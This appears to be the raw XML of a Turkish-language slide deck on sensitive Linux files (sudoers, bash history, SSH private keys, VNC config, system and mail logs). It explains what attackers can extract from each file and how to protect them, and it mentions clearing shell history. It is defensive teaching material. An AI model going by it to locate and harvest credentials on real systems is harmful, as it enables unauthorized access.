              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/etc/sudoers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyası düzenlenirken dikkatli olunmalı ve yalnızca güvenilir kullanıcılara gerekli izinler verilmelidir. Ayrıca, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/etc/sudoers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyasının okunabilirlik ve yazılabilirlik izinleri sınırlandırılmalı ve düzenli olarak güncellenerek sistemin güvenliği sağlanmalıdır.</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1ca0a5d3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1ca0a5d36_0_13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~/.bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyası, Bash kabuğunda (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) çalıştırılan komutların geçmişini tutan bir dosyadır. Bash kabuğunda çalıştırılan her komut, bu dosyaya otomatik olarak kaydedilir ve daha sonra tekrar çağrılabilir.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dosya, özellikle birden fazla kullanıcının erişimi olan bir sistemde, kötü niyetli kullanıcılar tarafından saldırı amacıyla kullanılabilir. Örneğin, bir saldırgan, bu dosyayı inceleyerek başka bir kullanıcının geçmişte yürüttüğü komutları görebilir ve bu komutları yeniden yürüterek sistemi hedefleyebilir.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nedenle, özellikle çok kullanıcılı sistemlerde, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>~/.bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyasının güvenliği çok önemlidir. Bu dosyanın izinleri yalnızca kullanıcının kendisi tarafından okunabilir ve yazılabilir olmalıdır. Ayrıca, bu dosya düzenli olarak temizlenmeli veya gizlenmelidir. Bu işlem, Bash kabuğunda çalışan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> komutu veya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>unset HISTFILE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> komutu kullanılarak yapılabilir.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örnekte, dosyada kaydedilmiş </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> komutları, hedef sisteme erişmek için kullanılan IP adresleri veya SSH anahtarları içerebilir. Ayrıca, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> veya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>psql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> gibi veritabanı bağlantıları, veritabanına erişim sağlamak için kullanılan kullanıcı adı ve şifreleri içerebilir. Bu bilgiler, bir saldırgan tarafından ele geçirilirse, hedef sisteme veya veritabanına erişim sağlamak için kullanılabilir.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~/.bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyası, kötü niyetli kişiler tarafından saldırı amacıyla kullanılabilir. Örneğin, bir saldırgan bu dosyayı ele geçirdiğinde, geçmişte yürütülmüş komutları inceleyerek sistemdeki zayıf noktaları belirleyebilir. Daha sonra, bu zayıf noktaları kullanarak, sisteme erişebilir veya kötü amaçlı yazılımlar yükleyebilir.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saldırganın hedeflediği sisteme erişimi yoksa, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>~/.bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyasından kullanıcı adı ve parola gibi hassas bilgileri arayabilir. Bu bilgileri ele geçirdikten sonra, sisteme erişim sağlayabilir veya başka bir saldırı yöntemi kullanarak sistemi hedef alabilir.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Ayrıca, saldırgan, geçmişte yürütülmüş komutlar arasında sık kullanılan uygulamalar veya programlar gibi önemli bilgileri de bulabilir. Bu bilgiler, saldırganın hedef sistemdeki zayıf noktaları veya hedeflenen kişileri belirlemesine yardımcı olabilir.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nedenle, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>~/.bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyasının güvenliği çok önemlidir. Dosya, yalnızca kullanıcının kendisi tarafından okunabilir ve yazılabilir olmalıdır. Ayrıca, bu dosya düzenli olarak temizlenmeli veya gizlenmelidir.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61ca0a5d36_1_36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64" name="Google Shape;64;g261ca0a5d36_1_364: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5" name="Google Shape;65;g261ca0a5d36_1_36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261ca0a5d36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261ca0a5d36_0_14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.ssh/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Linux ve Unix sistemlerinde SSH (Secure Shell) için varsayılan ana dizin olarak kullanılan gizli bir dizindir. Bu dizin, kullanıcının SSH anahtarlarını, yapılandırma dosyalarını ve diğer SSH ile ilgili dosyaları saklamak için kullanılır. Dizinin adının başında nokta işareti bulunması, dizinin gizli olduğunu ve normal şartlar altında görüntülenmediğini gösterir.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.ssh/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dizini altında bulunan dosyalar, özel anahtarlar, yetkilendirme dosyaları ve SSH yapılandırma dosyaları gibi hassas bilgiler içerebilir. Bu nedenle, bu dosyaların güvenliği büyük önem taşır ve kötü niyetli kişilerin eline geçmesi, kullanıcının sisteme yetkisiz erişim sağlamasına neden olabilir.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nedenle, kullanıcıların </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>.ssh/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dizininde bulunan dosyaları korumak için, şifreleme, parola koruması, anahtar yönetimi, düzenli yedekleme gibi önlemler alması önerilir. Ayrıca, SSH sunucusu yapılandırması da güvenlik açıklarını minimize etmek için dikkatli bir şekilde yapılandırılmalıdır.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SSH anahtar dosyaları genellikle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>.pub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> veya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>.key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> uzantıları ile biten dosya isimleri kullanırlar.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Ancak, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>~/.ssh/id_rsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> veya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>~/.ssh/id_dsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> gibi dosya isimleri, SSH anahtarlarının varsayılan olarak kaydedildiği yerlerdir. Bu dosyalar kullanıcının özel SSH anahtarlarını içerebilir.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.ssh/id_rsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Linux ve Unix sistemlerinde kullanılan SSH (Secure Shell) protokolü için bir özel anahtar dosyasıdır. Bu dosya, kullanıcının özel anahtarını içerir ve SSH ile güvenli bir şekilde oturum açmak için kullanılır.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anahtar dosyası, kullanıcının özel anahtarını saklar ve yetkisiz erişime karşı korumalıdır. Bu dosya, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>.ssh/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dizini altında yer alır ve kullanıcının özel anahtarını saklar. Bu nedenle, bu dosyanın güvenliği büyük önem taşır.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SSH özel anahtar dosyası (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>.ssh/id_rsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) genellikle binlerce karakter uzunluğunda bir metin dosyasıdır ve özel bir format kullanır. Bu dosyanın içeriği, anahtarın oluşturulduğu algoritma türüne ve anahtarın boyutuna göre değişir. </a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>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61ca0a5d36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261ca0a5d36_0_15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.vnc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> klasörü, Virtual Network Computing (VNC) protokolü aracılığıyla bir bilgisayara uzaktan erişmek için kullanılan bir program olan VNC sunucusunun yapılandırma dosyalarını içerir. Bu klasördeki dosyalar, VNC sunucusunun yapılandırmasını ve kullanıcının VNC sunucusuna bağlanırken kullanacağı kimlik bilgilerini içerebilir.</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1ca0a5d3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1ca0a5d36_0_16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/var/log/lastlog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyası, sisteme son giriş yapan kullanıcıların bilgilerini içeren bir log dosyasıdır. Bu dosya, özellikle bir sistemin güvenliği açısından önemlidir, çünkü son giriş yapan kullanıcıların kimlikleri ve zaman damgaları gibi bilgileri içerir. Bu dosyayı yalnızca root kullanıcısı veya özel izinlere sahip kullanıcılar görüntüleyebilir.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hackerlar, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/var/log/lastlog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyasını okuyabilmek için öncelikle hedef sistemdeki root hesabına veya bu dosyaya erişim izni olan başka bir kullanıcı hesabına erişim sağlamaları gerekecektir.</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1ca0a5d36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1ca0a5d36_0_6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/var/log/messages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyası, bir Linux sistemdeki çeşitli işlemlerle ilgili kayıtların tutulduğu bir sistem günlüğü dosyasıdır. Bu dosya, sistem kaynaklarının kullanımı, sistem etkinliği, hata mesajları ve diğer çeşitli olaylar hakkında bilgi içerebilir.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örnekte, her bir log kaydı, öncelikle tarih ve saat bilgisiyle başlar. Daha sonra, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> adlı sistemdeki </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hakkında bilgi içeren kayıtlar yer alır. Bu kayıtlar, sistem çekirdeği ile ilgili bilgiler içerir ve örnek olarak kernel sürümü, sistem yapılandırması ve işlemci bilgileri gibi bilgileri içerir.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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/var/log/messages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyasını ele geçirerek, sistemdeki işlem ve etkinlikler hakkında bilgi edinebilir.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/var/log/messages dosyası, Linux işletim sistemlerinde sistem olaylarının kaydedildiği bir günlük dosyasıdır. Sistem kaynaklarına erişim sağlayan tüm kullanıcılar için açıktır ve sistem hatalarının yanı sıra önemli olayları da kaydeder.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 dosyadaki bilgiler, bir hacker için değerli olabilir çünkü sisteme yapılan herhangi bir işlem veya yapılan herhangi bir değişiklik kaydedilir. Bu bilgiler, bir saldırganın sisteme erişim sağlamak için kullandığı yöntemleri, sistemi nasıl ele geçirdiğini ve neleri kontrol edebildiğini belirlemesine yardımcı olabilir.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Örneğin, /var/log/messages dosyasındaki bir kayıt, bir saldırganın bir güvenlik açığından yararlanarak sistemde kök erişimi elde ettiğini gösteriyor olabilir. Bu bilgi, saldırganın sistemi ele geçirmek için hangi adımları attığını anlamak ve daha sonra bu açığı kapatmak için önlem almak için kullanılabilir.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61ca0a5d3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61ca0a5d36_0_7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/var/log/maillog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Postfix, Sendmail veya diğer e-posta sunucuları tarafından gönderilen veya alınan e-postaların ayrıntılarını kaydeden bir log dosyasıdır. Bu log dosyası, e-posta sunucusunun çalışmasıyla ilgili bilgileri içerir ve sistem yöneticileri tarafından sorunları tespit etmek ve çözmek için kullanılır.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kullanıcı bir e-posta göndermeye çalıştığında, eğer gönderim başarısız olursa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/var/log/maillog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyası bu hata ile ilgili bilgileri kaydeder. Sistem yöneticileri, bu log dosyasını kullanarak neden e-posta gönderiminde bir sorun yaşandığını belirleyebilirler. Ayrıca, e-postaların nereye gönderildiğini, hangi kullanıcılara gönderildiğini ve hangi kullanıcılardan alındığını da takip edebilirler.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Bununla birlikte, saldırganlar da bu log dosyasını hedef alabilirler. Örneğin, saldırganlar, e-posta sunucusundaki kullanıcıların e-posta adreslerini toplamak veya e-posta sunucusuna yetkisiz erişim sağlamak için </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/var/log/maillog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyasını analiz edebilirler. Bu nedenle, sistem yöneticileri, e-posta sunucusundaki log dosyalarının güvenliğini sağlamak için gerekli önlemleri almalıdırlar.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>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 çıktıda, ilk satırda, bir e-posta gönderiminde bir hata olduğunu belirten "Connection timed out" hatası görülüyor. İkinci satırda, Postfix ana süreci tarafından bir uyarı mesajı görüntüleniyor ve üçüncü satırda, hatalı bir gönderim işlemi nedeniyle gönderme işlemlerine bir süreliğine ara verileceği belirtiliyor.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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61ca0a5d36_0_189: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551" name="Google Shape;551;g261ca0a5d36_0_189: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2" name="Google Shape;552;g261ca0a5d36_0_189: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61ca0a5d36_1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61ca0a5d36_1_40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1ca0a5d36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1ca0a5d36_1_3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9df184e96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9df184e960_0_21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61ca0a5d3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61ca0a5d36_1_4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9df184e96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9df184e960_0_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61ca0a5d3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61ca0a5d36_1_4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61ca0a5d36_1_313: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597" name="Google Shape;597;g261ca0a5d36_1_313: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8" name="Google Shape;598;g261ca0a5d36_1_313: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a6a963d266_1_0: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605" name="Google Shape;605;g2a6a963d266_1_0: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6" name="Google Shape;606;g2a6a963d266_1_0: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61ca0a5d36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61ca0a5d36_1_32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6a963d2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a6a963d266_0_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61ca0a5d36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61ca0a5d36_1_3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a6a963d26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a6a963d266_0_1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a6a963d26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a6a963d266_0_31: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61ca0a5d36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61ca0a5d36_1_33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a6a963d26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a6a963d266_0_5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9df184e96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9df184e960_0_1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61ca0a5d36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61ca0a5d36_1_343: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a6a963d266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a6a963d266_0_6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1ca0a5d36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1ca0a5d36_1_35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a6a963d26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a6a963d266_0_8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61ca0a5d36_1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61ca0a5d36_1_357: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61ca0a5d3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61ca0a5d36_1_2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61ca0a5d36_1_57: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723" name="Google Shape;723;g261ca0a5d36_1_57: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24" name="Google Shape;724;g261ca0a5d36_1_57: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615ee39d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615ee39d07_1_0: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a:t>https://helpdeskgeek.com/help-desk/21-cmd-commands-all-windows-users-should-know/</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61ca0a5d36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261ca0a5d36_0_226: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1ca0a5d3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1ca0a5d36_0_20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9df184e9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9df184e960_0_2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61ca0a5d36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61ca0a5d36_0_21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1ca0a5d3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61ca0a5d36_0_21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61ca0a5d36_1_64:notes"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971500" cy="4569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latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="771" name="Google Shape;771;g261ca0a5d36_1_64:notes"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381050" y="685800"/>
            <a:ext cx="6095700" cy="34287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72" name="Google Shape;772;g261ca0a5d36_1_64:notes"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486100" cy="4114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2000" u="none" cap="none" strike="noStrike">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Aria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9e8060eac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9e8060eac0_0_4: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ad1b918ce9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2ad1b918ce9_1_18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ad1b918ce9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ad1b918ce9_1_178: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9e8060eac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9e8060eac0_0_1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9e8060eac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9e8060eac0_0_29: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9df184e960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9df184e960_0_135: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rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/etc/resolv.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyası, sistemdeki DNS (Domain Name System) ayarlarını içeren bir sistem dosyasıdır. Dosyanın üst kısmında, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t># Generated by NetworkManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> yorum satırı, dosyanın NetworkManager tarafından otomatik olarak oluşturulduğunu belirtir.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Ardından, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
